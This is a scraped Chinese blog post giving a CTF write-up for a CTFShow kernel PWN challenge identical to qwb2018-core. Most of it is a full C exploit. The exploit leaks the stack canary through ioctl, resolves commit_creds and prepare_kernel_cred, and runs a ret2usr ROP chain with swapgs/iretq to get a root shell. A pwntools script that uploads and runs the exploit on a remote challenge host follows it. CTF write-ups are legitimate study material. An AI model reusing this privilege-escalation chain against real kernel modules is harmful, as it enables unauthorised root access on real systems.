当前位置：首页 > news >正文

CTFShow PWN入门---Kernel PWN 356-360 [持续更新]

news 2025/8/15 17:24:10

PWN 356

本题和强网杯 2018的 qwb2018-core一模一样。
详细请看我之前的文章： Kernel PWN 入门(二)

exp：

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <string.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/ioctl.h>size_t user_cs, user_ss, user_rflags, user_sp;
size_t nokalsr_kernel_base = 0xffffffff81000000;
size_t prepare_kernel_cred_addr;
size_t commit_creds_addr;void save_status()
{__asm__("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");puts("[*]status has been saved.");
}void get_shell(){if(getuid()==0){printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");system("/bin/sh");}else{puts("[-] get root shell failed.");exit(-1);}
}void get_root(){           //ret2userchar* (*pkc)(int) = prepare_kernel_cred_addr;void (*cc)(char*) = commit_creds_addr;(*cc)((*pkc)(0));
}int show_read(int fd,size_t* addr){if(ioctl(fd,1719109787,addr)==-1){printf("[*]show_read failed");return -1;}return 0;}int set_off(int fd,int off){if(ioctl(fd,1719109788,off) == -1){printf("[*]show_read failed");return -1;}return 0;
}int show_copy_func(int fd,unsigned long len){if(ioctl(fd,1719109786,len)==-1){printf("[*]show_read failed");return -1;}return 0;
}unsigned long get_symbol_address(const char *symbol_name) {FILE *fp;char line[1024];unsigned long address;char symbol[1024];// 打开 /proc/kallsyms 文件fp = fopen("/tmp/kallsyms", "r");if (fp == NULL) {perror("fopen");return 0;}// 遍历每一行，查找符号while (fgets(line, sizeof(line), fp) != NULL) {// 解析每行的地址和符号名称if (sscanf(line, "%lx %*c %s", &address, symbol) == 2) {// 如果符号名称匹配，返回地址if (strcmp(symbol, symbol_name) == 0) {fclose(fp);return address;}}}// 如果没有找到符号，返回 0fclose(fp);return 0;
}int main(){save_status();//leak stackint fd = open("/proc/show",O_RDWR);int i = 0;size_t stack[16] = {0};size_t rop[0x50] = {0};set_off(fd,0x40);show_read(fd,stack);size_t canary = stack[0];printf("canary is ------------->: 0x%lx\n",canary);//leak addrsize_t startup_64 = get_symbol_address("startup_64");unsigned long offset = startup_64-nokalsr_kernel_base;prepare_kernel_cred_addr = get_symbol_address("prepare_kernel_cred");commit_creds_addr = get_symbol_address("commit_creds");printf("offset is ==========>: %lx\n",offset);printf("prepare_kernel_cred_addr is ==========>: %lx\n",prepare_kernel_cred_addr);printf("commit_creds_addr is ==========>: %lx\n",commit_creds_addr);//ropsize_t pop_rdi_ret = 0xffffffff81000b2f+offset;size_t swapgs_popfq_ret = 0xffffffff81a012da+offset;size_t iretq_ret = 0xffffffff81050ac2+offset;for(int j =0;j<10;j++){rop[i++] = 0;}rop[8] = canary;rop[i++] = (size_t)get_root;rop[i++] = swapgs_popfq_ret;rop[i++] = 0;rop[i++] = iretq_ret;rop[i++] = (size_t)get_shell;rop[i++] = user_cs;rop[i++] = user_rflags;rop[i++] = user_sp;rop[i++] = user_ss;write(fd,rop,0x100);show_copy_func(fd,0xffffffffffff0100);return 0;
}

在这里插入图片描述

打远程用的脚本：

from pwn import *
import base64
context.log_level = "debug"with open("./exp", "rb") as f:exp = base64.b64encode(f.read())p = remote("pwn.challenge.ctf.show", 28290)
#p = process('./run.sh')
try_count = 1
while True:p.sendline()p.recvuntil("/ $")count = 0for i in range(0, len(exp), 0x200):p.sendline("echo -n \"" + exp[i:i + 0x200].decode() + "\" >> /tmp/b64_exp")count += 1log.info("count: " + str(count))for i in range(count):p.recvuntil("/ $")p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit")p.sendline("chmod +x /tmp/exploit")p.sendline("/tmp/exploit ")breakp.interactive()